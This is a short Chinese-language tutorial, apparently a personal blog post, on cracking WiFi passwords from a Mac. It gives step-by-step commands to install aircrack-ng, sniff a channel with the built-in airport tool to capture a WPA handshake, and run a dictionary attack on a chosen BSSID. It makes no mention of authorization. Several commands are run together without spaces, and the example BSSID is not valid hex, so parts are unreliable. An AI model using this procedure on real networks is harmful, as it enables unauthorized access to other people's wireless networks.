使用Mac暴力破解WiFi密码

1、安装aircrack-ng

命令：brewinstallaircrack-ng

注意，如果没安装brew,访问：https://brew.sh，首页上有安装brew的命令，我安装时（201706）命令如下：

/usr/bin/ruby -e "$(curl -fsSLhttps://raw.githubusercontent.com/Homebrew/install/master/install)"

2、添加airport快链

命令：ln-s /System/Library/PrivateFrameworks/Apple80211.framework/Versions/Current/Resources/airport /usr/local/bin/airport

3、使用mac自带的airport选取mac地址

命令：airport-s

选择CHANNEL的数值，比如：11

4、监听选定的频道获取到握手的包

命令：airport en0 sniff 11

运行一段时间，就可以在/tmp收获以.cap结尾的分析包，结束之后会提示保存的.cap文件位置

注意：（1）尽可能不要运行太长时间，否则.cap文件会比较大；

（2）可以使用ctr+c结束运行(我刚开始就不知道🙈)；

（3）如果提示权限问题，则使用 sudoairport en0 sniff 11

5、用 aircrack-ng分析cap包

命令：sudoaircrack-ng  /tmp/airportSniff******.cap

找到有(1 handshake)的那一行记录，记录下BSSID（比如是:10:02:22:23:7v:6f）。

建议直接搜索，否则能看晕，如果没有搜索到，请重新执行第4步；

6、开始暴力破解

命令：sudo aircrack-ng-wpojie.txt-b10:02:22:23:7v:6f/tmp/airportSniff******.cap

注意：.txt为破解字典

如果有碰撞到密码，程序会停止，并显示密码。

本文参考别的资料实践并结合实际情况进行总结，权做记录学习之用。